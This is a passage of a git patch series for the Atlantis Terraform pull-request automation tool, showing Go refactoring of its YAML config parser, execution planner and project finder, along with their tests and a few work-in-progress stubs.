parseAndValidate(configData []byte) (Config, error) { var repoConfig Config if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { - // Unmarshal error messages aren't fit for user output. We need to - // massage them. - // todo: fix "field autoplan not found in struct yaml.alias" errors - return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.Config", "", -1)) + return repoConfig, err } // Validate version. diff --git a/server/events/yaml/reader_test.go b/server/events/yaml/parser_validator_test.go similarity index 71% rename from server/events/yaml/reader_test.go rename to server/events/yaml/parser_validator_test.go index 7dc4b25b4c..4adc8ca34d 100644 --- a/server/events/yaml/reader_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -2,6 +2,7 @@ package yaml_test import ( "io/ioutil" + "os" "path/filepath" "testing" @@ -10,20 +11,18 @@ import ( ) func TestReadConfig_DirDoesNotExist(t *testing.T) { - r := yaml.Reader{} - conf, err := r.ReadConfig("/not/exist") - Ok(t, err) - Assert(t, conf == nil, "exp nil ptr") + r := yaml.ParserValidator{} + _, err := r.ReadConfig("/not/exist") + Assert(t, os.IsNotExist(err), "exp nil ptr") } func TestReadConfig_FileDoesNotExist(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - r := yaml.Reader{} - conf, err := r.ReadConfig(tmpDir) - Ok(t, err) - Assert(t, conf == nil, "exp nil ptr") + r := yaml.ParserValidator{} + _, err := r.ReadConfig(tmpDir) + Assert(t, os.IsNotExist(err), "exp nil ptr") } func TestReadConfig_BadPermissions(t *testing.T) { @@ -32,7 +31,7 @@ func TestReadConfig_BadPermissions(t *testing.T) { err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} _, err = r.ReadConfig(tmpDir) ErrContains(t, "unable to read atlantis.yaml file: ", err) } @@ -48,7 +47,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { { "random characters", "slkjds", - "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds`", + "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Config", }, { "just a colon", @@ -64,7 +63,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { t.Run(c.description, func(t *testing.T) { err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, c.expErr, err) }) @@ -161,175 +160,6 @@ projects: - unknown: value`, expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", }, - - // project workflow doesn't exist - // workflow has plan and apply keys (otherwise no point specifying it) - // plan/apply stages must have non-empty steps key - - // Test the steps key. - { - description: "unsupported step type", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - unsupported`, - expErr: "unsupported step type: \"unsupported\"", - }, - - // Init step. - { - description: "unsupported arg to init step", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init: - extra_args: ["hi"] - hi: bye -`, - expErr: "unsupported key \"hi\" for step init – the only supported key is extra_args", - }, - { - description: "invalid value type to init step's extra_args", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init: - extra_args: arg -`, - expErr: "expected array of strings as value of extra_args, not \"arg\"", - }, - - // Plan step. - { - description: "unsupported arg to plan step", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - plan: - extra_args: ["hi"] - hi: bye -`, - expErr: "unsupported key \"hi\" for step plan – the only supported key is extra_args", - }, - { - description: "invalid value type to plan step's extra_args", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - plan: - extra_args: arg -`, - expErr: "expected array of strings as value of extra_args, not \"arg\"", - }, - - // Apply step. - { - description: "unsupported arg to apply step", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - apply: - extra_args: ["hi"] - hi: bye -`, - expErr: "unsupported key \"hi\" for step apply – the only supported key is extra_args", - }, - { - description: "invalid value type to apply step's extra_args", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - apply: - extra_args: arg -`, - expErr: "expected array of strings as value of extra_args, not \"arg\"", - }, - { - description: "invalid step type", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - rn: echo should fail -`, - expErr: "yaml: unmarshal errors:\n line 9: field rn not found in struct struct { Run string \"yaml:\\\"run\\\"\" }", - }, - { - description: "missed the steps key and just set an array directly", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - - init -`, - expErr: "missing \"steps\" key", - }, - { - description: "no value after plan:", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: -`, - expErr: "missing \"steps\" key", - }, - { - description: "no value after apply:", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: -`, - expErr: "missing \"steps\" key", - }, } tmpDir, cleanup := TempDir(t) @@ -340,7 +170,7 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) }) @@ -595,7 +425,7 @@ workflows: Steps: []yaml.StepConfig{ { StepType: "init", - ExtraArgs: nil, + ExtraArgs: []string{}, }, { StepType: "plan", @@ -642,18 +472,16 @@ workflows: Plan: &yaml.Stage{ Steps: []yaml.StepConfig{ { - StepType: "run", - ExtraArgs: nil, - Run: []string{"echo", "plan hi"}, + StepType: "run", + Run: []string{"echo", "plan hi"}, }, }, }, Apply: &yaml.Stage{ Steps: []yaml.StepConfig{ { - StepType: "run", - ExtraArgs: nil, - Run: []string{"echo", "apply", "arg 2"}, + StepType: "run", + Run: []string{"echo", "apply", "arg 2"}, }, }, }, @@ -671,10 +499,10 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} act, err := r.ReadConfig(tmpDir) Ok(t, err) - Equals(t, &c.expOutput, act) + Equals(t, c.expOutput, act) }) } } diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go index b2c136e59d..dade99baef 100644 --- a/server/events/yaml/project.go +++ b/server/events/yaml/project.go @@ -9,12 +9,14 @@ type Project struct { ApplyRequirements []string `yaml:"apply_requirements"` } +const DefaultWorkspace = "default" + func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { // Use a type alias so unmarshal doesn't get into an infinite loop. type alias Project // Set up defaults. defaults := alias{ - Workspace: defaultWorkspace, + Workspace: DefaultWorkspace, AutoPlan: &AutoPlan{ Enabled: true, WhenModified: []string{"**/*.tf"}, diff --git a/server/events/yaml/run_step_test.go b/server/events/yaml/run_step_test.go deleted file mode 100644 index d00e3ec788..0000000000 --- a/server/events/yaml/run_step_test.go +++ /dev/null @@ -1,3 +0,0 @@ -package yaml - -// todo diff --git a/server/events/yaml/yaml.go b/server/events/yaml/yaml.go new file mode 100644 index 0000000000..08b884cae0 --- /dev/null +++ b/server/events/yaml/yaml.go @@ -0,0 +1,4 @@ +// Package yaml contains the golang representations of the YAML elements +// supported in atlantis.yaml. Many of the elements implement UnmarshalYAML +// in order to set defaults. +package yaml diff --git a/server/server.go b/server/server.go index 9381d74690..8ae0e5b6eb 100644 --- a/server/server.go +++ b/server/server.go @@ -37,6 +37,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -200,8 +201,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ConfigReader: configReader, Terraform: terraformClient, } - executionPlanner := &yaml.ExecutionPlanner{ - ConfigReader: &yaml.Reader{}, + executionPlanner := &runtime.ExecutionPlanner{ + ParserValidator: &yaml.ParserValidator{}, DefaultTFVersion: terraformClient.Version(), TerraformExecutor: terraformClient, } From 437b62591a467e54b7e5ff42295dd626a9167daf Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 8 Jun 2018 20:58:29 +0100 Subject: [PATCH 16/69] Test execution_planner --- server/events/runtime/execution_planner.go | 22 +- .../events/runtime/execution_planner_test.go | 198 ++++++++++++++++++ testing/temp_files.go | 4 +- 3 files changed, 212 insertions(+), 12 deletions(-) create mode 100644 server/events/runtime/execution_planner_test.go diff --git a/server/events/runtime/execution_planner.go b/server/events/runtime/execution_planner.go index 012d6b008d..401efa7c4e 100644 --- a/server/events/runtime/execution_planner.go +++ b/server/events/runtime/execution_planner.go @@ -35,6 +35,17 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str }, nil } +func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { + defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) + if err != nil { + return nil, err + } + return &ApplyStage{ + Steps: steps, + }, nil +} + func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) { config, err := s.ParserValidator.ReadConfig(repoDir) @@ -108,17 +119,6 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge return defaults, nil } -func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { - defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) - if err != nil { - return nil, err - } - return &ApplyStage{ - Steps: steps, - }, nil -} - func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) StepMeta { return StepMeta{ Log: log, diff --git a/server/events/runtime/execution_planner_test.go b/server/events/runtime/execution_planner_test.go new file mode 100644 index 0000000000..9c3fd5ac4d --- /dev/null +++ b/server/events/runtime/execution_planner_test.go @@ -0,0 +1,198 @@ +package runtime_test + +import ( + "io/ioutil" + "path/filepath" + "testing" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +// When there is no config file, should use the defaults. +func TestBuildStage_NoConfigFile(t *testing.T) { + var defaultTFVersion *version.Version + var terraformExecutor runtime.TerraformExec + e := runtime.ExecutionPlanner{ + DefaultTFVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + } + + log := logging.NewNoopLogger() + repoDir := "/willnotexist" + workspace := "myworkspace" + relProjectPath := "mydir" + var extraCommentArgs []string + username := "myuser" + meta := runtime.StepMeta{ + Log: log, + Workspace: workspace, + AbsolutePath: filepath.Join(repoDir, relProjectPath), + DirRelativeToRepoRoot: relProjectPath, + TerraformVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + ExtraCommentArgs: extraCommentArgs, + Username: username, + } + + // Test the plan stage first. + t.Run("plan stage", func(t *testing.T) { + planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.PlanStage{ + Steps: []runtime.Step{ + &runtime.InitStep{ + Meta: meta, + }, + &runtime.PlanStep{ + Meta: meta, + }, + }, + }, *planStage) + }) + + // Then the apply stage. + t.Run("apply stage", func(t *testing.T) { + applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.ApplyStage{ + Steps: []runtime.Step{ + &runtime.ApplyStep{ + Meta: meta, + }, + }, + }, *applyStage) + }) +} + +func TestBuildStage(t *testing.T) { + var defaultTFVersion *version.Version + var terraformExecutor runtime.TerraformExec + e := runtime.ExecutionPlanner{ + DefaultTFVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + } + + // Write atlantis.yaml config. + tmpDir, cleanup := TempDir(t) + defer cleanup() + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(` +version: 2 +projects: +- dir: "." + workflow: custom +workflows: + custom: + plan: + steps: + - init: + extra_args: [arg1, arg2] + - plan + - run: echo hi + apply: + steps: + - run: prerun + - apply: + extra_args: [arg3, arg4] + - run: postrun +`), 0644) + Ok(t, err) + + repoDir := tmpDir + log := logging.NewNoopLogger() + workspace := "myworkspace" + // Our config is for '.' so there will be no config for this project. + relProjectPath := "mydir" + var extraCommentArgs []string + username := "myuser" + meta := runtime.StepMeta{ + Log: log, + Workspace: workspace, + AbsolutePath: filepath.Join(repoDir, relProjectPath), + DirRelativeToRepoRoot: relProjectPath, + TerraformVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + ExtraCommentArgs: extraCommentArgs, + Username: username, + } + + t.Run("plan stage for project without config", func(t *testing.T) { + // This project isn't listed so it should get the defaults. + planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.PlanStage{ + Steps: []runtime.Step{ + &runtime.InitStep{ + Meta: meta, + }, + &runtime.PlanStep{ + Meta: meta, + }, + }, + }, *planStage) + }) + + t.Run("apply stage for project without config", func(t *testing.T) { + // This project isn't listed so it should get the defaults. + applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.ApplyStage{ + Steps: []runtime.Step{ + &runtime.ApplyStep{ + Meta: meta, + }, + }, + }, *applyStage) + }) + + // Create the meta for the custom project. + customMeta := meta + customMeta.Workspace = "default" + customMeta.DirRelativeToRepoRoot = "." + customMeta.AbsolutePath = tmpDir + + t.Run("plan stage for custom config", func(t *testing.T) { + planStage, err := e.BuildPlanStage(log, repoDir, "default", ".", extraCommentArgs, username) + Ok(t, err) + + Equals(t, runtime.PlanStage{ + Steps: []runtime.Step{ + &runtime.InitStep{ + Meta: customMeta, + ExtraArgs: []string{"arg1", "arg2"}, + }, + &runtime.PlanStep{ + Meta: customMeta, + }, + &runtime.RunStep{ + Meta: customMeta, + Commands: []string{"echo", "hi"}, + }, + }, + }, *planStage) + }) + + t.Run("apply stage for custom config", func(t *testing.T) { + planStage, err := e.BuildApplyStage(log, repoDir, "default", ".", extraCommentArgs, username) + Ok(t, err) + + Equals(t, runtime.ApplyStage{ + Steps: []runtime.Step{ + &runtime.RunStep{ + Meta: customMeta, + Commands: []string{"prerun"}, + }, + &runtime.ApplyStep{ + Meta: customMeta, + ExtraArgs: []string{"arg3", "arg4"}, + }, + &runtime.RunStep{ + Meta: customMeta, + Commands: []string{"postrun"}, + }, + }, + }, *planStage) + }) +} diff --git a/testing/temp_files.go b/testing/temp_files.go index f91074967a..85dd68c5b1 100644 --- a/testing/temp_files.go +++ b/testing/temp_files.go @@ -7,7 +7,9 @@ import ( ) // TempDir creates a temporary directory and returns its path along -// with a cleanup function to be called via defer. +// with a cleanup function to be called via defer, ex: +// dir, cleanup := TempDir() +// defer cleanup() func TempDir(t *testing.T) (string, func()) { tmpDir, err := ioutil.TempDir("", "") Ok(t, err) From 9839e0dac1f31583be4c68c38cbeb25408aa4074 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 11 Jun 2018 18:00:57 +0100 Subject: [PATCH 17/69] Move execution planner. Don't plan in deleted dirs --- .../events/{runtime => }/execution_planner.go | 53 +++++++- .../{runtime => }/execution_planner_test.go | 0 server/events/project_finder.go | 42 +++++-- server/events/project_finder_test.go | 116 +++++++++++------- 4 files changed, 154 insertions(+), 57 deletions(-) rename server/events/{runtime => }/execution_planner.go (74%) rename server/events/{runtime => }/execution_planner_test.go (100%) diff --git a/server/events/runtime/execution_planner.go b/server/events/execution_planner.go similarity index 74% rename from server/events/runtime/execution_planner.go rename to server/events/execution_planner.go index 401efa7c4e..eee10f5890 100644 --- a/server/events/runtime/execution_planner.go +++ b/server/events/execution_planner.go @@ -6,6 +6,7 @@ import ( "path/filepath" "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events" "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" ) @@ -18,13 +19,14 @@ type ExecutionPlanner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version ParserValidator *yaml.ParserValidator + ProjectFinder events.ProjectFinder } type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*PlanStage, error) { +func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (PlanStage, error) { defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) if err != nil { @@ -35,6 +37,55 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str }, nil } +func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]PlanStage, error) { + // If there is an atlantis.yaml + // -> Get modified files from pull request. + // -> For each project, if autoplan == true && files match + // ->-> Build plan stage for that project. + // Else + // -> Get modified files + // -> For each modified project use default plan stage. + config, err := s.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return nil, err + } + + // If there is no config file, then we try to plan for each project that + // was modified in the pull request. + if os.IsNotExist(err) { + projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir) + var stages []PlanStage + for _, p := range projects { + // NOTE: we use the default workspace because we don't know about + // other workspaces. If users want to plan for other workspaces they + // need to use a config file. + steps := s.defaultPlanSteps(log, repoDir, defaultWorkspace, p.Path, nil, username) + stages = append(stages, PlanStage{ + Steps: steps, + }) + } + return stages, nil + } + + // Else we run plan according to the config file. + var stages []PlanStage + for _, p := range config.Projects { + if s.shouldAutoplan(p.AutoPlan, modifiedFiles) { + // todo + stages = append(stages) + } + } + return stages, nil +} + +func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool { + +} + +func (s *ExecutionPlanner) getSteps() { + +} + func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) diff --git a/server/events/runtime/execution_planner_test.go b/server/events/execution_planner_test.go similarity index 100% rename from server/events/runtime/execution_planner_test.go rename to server/events/execution_planner_test.go diff --git a/server/events/project_finder.go b/server/events/project_finder.go index e14c3b7e72..315f480bd5 100644 --- a/server/events/project_finder.go +++ b/server/events/project_finder.go @@ -49,19 +49,26 @@ func (p *DefaultProjectFinder) DetermineProjects(log *logging.SimpleLogger, modi log.Info("filtered modified files to %d .tf files: %v", len(modifiedTerraformFiles), modifiedTerraformFiles) - var paths []string + var dirs []string for _, modifiedFile := range modifiedTerraformFiles { - projectPath := p.getProjectPath(modifiedFile, repoDir) - if projectPath != "" { - paths = append(paths, projectPath) + projectDir := p.getProjectDir(modifiedFile, repoDir) + if projectDir != "" { + dirs = append(dirs, projectDir) } } - uniquePaths := p.unique(paths) - for _, uniquePath := range uniquePaths { - projects = append(projects, models.NewProject(repoFullName, uniquePath)) + uniqueDirs := p.unique(dirs) + + // The list of modified files will include files that were deleted. We still + // want to run plan if a file was deleted since that often results in a + // change however we want to remove directories that have been completely + // deleted. + exists := p.filterToDirExists(uniqueDirs, repoDir) + + for _, p := range exists { + projects = append(projects, models.NewProject(repoFullName, p)) } log.Info("there are %d modified project(s) at path(s): %v", - len(projects), strings.Join(uniquePaths, ", ")) + len(projects), strings.Join(exists, ", ")) return projects } @@ -84,12 +91,12 @@ func (p *DefaultProjectFinder) isInExcludeList(fileName string) bool { return false } -// getProjectPath attempts to determine based on the location of a modified +// getProjectDir attempts to determine based on the location of a modified // file, where the root of the Terraform project is. It also attempts to verify // if the root is valid by looking for a main.tf file. It returns a relative -// path. If the project is at the root returns ".". If modified file doesn't -// lead to a valid project path, returns an empty string. -func (p *DefaultProjectFinder) getProjectPath(modifiedFilePath string, repoDir string) string { +// path to the repo. If the project is at the root returns ".". If modified file +// doesn't lead to a valid project path, returns an empty string. +func (p *DefaultProjectFinder) getProjectDir(modifiedFilePath string, repoDir string) string { dir := path.Dir(modifiedFilePath) if path.Base(dir) == "env" { // If the modified file was inside an env/ directory, we treat this @@ -159,3 +166,14 @@ func (p *DefaultProjectFinder) unique(strs []string) []string { } return unique } + +func (p *DefaultProjectFinder) filterToDirExists(relativePaths []string, repoDir string) []string { + var filtered []string + for _, pth := range relativePaths { + absPath := filepath.Join(repoDir, pth) + if _, err := os.Stat(absPath); !os.IsNotExist(err) { + filtered = append(filtered, pth) + } + } + return filtered +} diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go index dd9af7792f..8e787a6eec 100644 --- a/server/events/project_finder_test.go +++ b/server/events/project_finder_test.go @@ -30,24 +30,37 @@ var m = events.DefaultProjectFinder{} var nestedModules1 string var nestedModules2 string var topLevelModules string +var envDir string func setupTmpRepos(t *testing.T) { // Create different repo structures for testing. // 1. Nested modules directory inside a project + // non-tf + // terraform.tfstate + // terraform.tfstate.backup // project1/ // main.tf + // terraform.tfstate + // terraform.tfstate.backup // modules/ // main.tf var err error nestedModules1, err = ioutil.TempDir("", "") - Ok(t, err) err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700) Ok(t, err) - _, err = os.Create(filepath.Join(nestedModules1, "project1/main.tf")) - Ok(t, err) - _, err = os.Create(filepath.Join(nestedModules1, "project1/modules/main.tf")) - Ok(t, err) + files := []string{ + "non-tf", + "terraform.tfstate.backup", + "project1/main.tf", + "project1/terraform.tfstate", + "project1/terraform.tfstate.backup", + "project1/modules/main.tf", + } + for _, f := range files { + _, err = os.Create(filepath.Join(nestedModules1, f)) + Ok(t, err) + } // 2. Nested modules dir inside top-level project // main.tf @@ -71,6 +84,20 @@ func setupTmpRepos(t *testing.T) { _, err = os.Create(filepath.Join(topLevelModules, path, "main.tf")) Ok(t, err) } + + // 4. Env/ dir + // main.tf + // env/ + // staging.tfvars + // production.tfvars + envDir, err = ioutil.TempDir("", "") + Ok(t, err) + err = os.MkdirAll(filepath.Join(envDir, "env"), 0700) + Ok(t, err) + _, err = os.Create(filepath.Join(envDir, "env/staging.tfvars")) + Ok(t, err) + _, err = os.Create(filepath.Join(envDir, "env/production.tfvars")) + Ok(t, err) } func TestDetermineProjects(t *testing.T) { @@ -86,13 +113,13 @@ func TestDetermineProjects(t *testing.T) { "If no files were modified then should return an empty list", nil, nil, - "", + nestedModules1, }, { "Should ignore non .tf files and return an empty list", []string{"non-tf"}, nil, - "", + nestedModules1, }, { "Should plan in the parent directory from modules if that dir has a main.tf", @@ -128,65 +155,66 @@ func TestDetermineProjects(t *testing.T) { "Should ignore tfstate files and return an empty list", []string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"}, nil, - "", - }, - { - "Should ignore tfstate files and return an empty list", - []string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"}, - nil, - "", + nestedModules1, }, { "Should return '.' when changed file is at root", []string{"a.tf"}, []string{"."}, - "", + nestedModules2, }, { "Should return directory when changed file is in a dir", - []string{"parent/a.tf"}, - []string{"parent"}, - "", + []string{"project1/a.tf"}, + []string{"project1"}, + nestedModules1, }, { "Should return parent dir when changed file is in an env/ dir", - []string{"env/a.tfvars"}, + []string{"env/staging.tfvars"}, []string{"."}, - "", + envDir, }, { "Should de-duplicate when multiple files changed in the same dir", - []string{"root.tf", "env/env.tfvars", "parent/parent.tf", "parent/parent2.tf", "parent/child/child.tf", "parent/child/env/env.tfvars"}, - []string{".", "parent", "parent/child"}, + []string{"env/staging.tfvars", "main.tf", "other.tf"}, + []string{"."}, + "", + }, + { + "Should ignore changes in a dir that was deleted", + []string{"wasdeleted/main.tf"}, + []string{}, "", }, } for _, c := range cases { - t.Log(c.description) - projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir) + t.Run(c.description, func(t *testing.T) { + projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir) - // Extract the paths from the projects. We use a slice here instead of a - // map so we can test whether there are duplicates returned. - var paths []string - for _, project := range projects { - paths = append(paths, project.Path) - // Check that the project object has the repo set properly. - Equals(t, modifiedRepo, project.RepoFullName) - } - Assert(t, len(c.expProjectPaths) == len(paths), - "exp %d paths but found %d. They were %v", len(c.expProjectPaths), len(paths), paths) + // Extract the paths from the projects. We use a slice here instead of a + // map so we can test whether there are duplicates returned. + var paths []string + for _, project := range projects { + paths = append(paths, project.Path) + // Check that the project object has the repo set properly. + Equals(t, modifiedRepo, project.RepoFullName) + } + Assert(t, len(c.expProjectPaths) == len(paths), + "exp %q but found %q", c.expProjectPaths, paths) - for _, expPath := range c.expProjectPaths { - found := false - for _, actPath := range paths { - if expPath == actPath { - found = true - break + for _, expPath := range c.expProjectPaths { + found := false + for _, actPath := range paths { + if expPath == actPath { + found = true + break + } + } + if !found { + t.Fatalf("exp %q but was not in paths %v", expPath, paths) } } - if !found { - t.Fatalf("exp %q but was not in paths %v", expPath, paths) - } - } + }) } } From 3525ab3bd9d9858309a4b357482d39fca4ea9d09 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 12 Jun 2018 14:54:38 +0100 Subject: [PATCH 18/69] WIP --- CHANGELOG.md | 14 + server/events/apply_executor.go | 3 +- server/events/command_context.go | 4 +- server/events/command_handler.go | 2 - server/events/comment_parser.go | 2 +- server/events/event_parser.go | 26 +- server/events/event_parser_test.go | 10 +- server/events/execution_planner.go | 69 +-- server/events/execution_planner_test.go | 13 +- server/events/markdown_renderer.go | 48 +- server/events/mocks/mock_event_parsing.go | 14 +- server/events/models/models.go | 5 + server/events/plan_executor.go | 72 ++- server/events/plan_executor_test.go | 547 +++++++++++----------- server/events/project_result.go | 1 + server/events/runtime/repoconfig.go | 8 +- server/events/yaml/project.go | 14 +- server/events_controller.go | 99 +++- server/server.go | 6 +- 19 files changed, 553 insertions(+), 404 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 776ab26210..fc99816502 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,3 +1,17 @@ +# v0.4.0-alpha + +## Features + +## Bugfixes +* Won't attempt to run plan in a directory that was deleted. + +## Backwards Incompatibilities / Notes: + +## Downloads + +## Docker + + # v0.3.10 ## Features diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index dbacf35a64..260a7fffa0 100644 --- a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -16,7 +16,6 @@ package events import ( "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -31,7 +30,7 @@ type ApplyExecutor struct { AtlantisWorkspace AtlantisWorkspace ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender - ExecutionPlanner *runtime.ExecutionPlanner + ExecutionPlanner *ExecutionPlanner } // Execute executes apply for the ctx. diff --git a/server/events/command_context.go b/server/events/command_context.go index 35a2a1b141..f986e43cc3 100644 --- a/server/events/command_context.go +++ b/server/events/command_context.go @@ -18,8 +18,8 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) -// CommandContext represents the context of a command that came from a comment -// on a pull request. +// CommandContext represents the context of a command that should be executed +// for a pull request. type CommandContext struct { // BaseRepo is the repository that the pull request will be merged into. BaseRepo models.Repo diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 047d5f936a..54c0ffa47f 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -137,8 +137,6 @@ func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging. } func (c *CommandHandler) run(ctx *CommandContext) { - log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num) - ctx.Log = log defer c.logPanics(ctx) if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner { diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go index 2c9e1b0c1b..69e845197a 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -199,7 +199,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen } return CommentParseResult{ - Command: NewCommand(dir, extraArgs, name, verbose, workspace), + Command: NewCommand(dir, extraArgs, name, verbose, workspace, false), } } diff --git a/server/events/event_parser.go b/server/events/event_parser.go index cd3e36f5b3..742a765a99 100644 --- 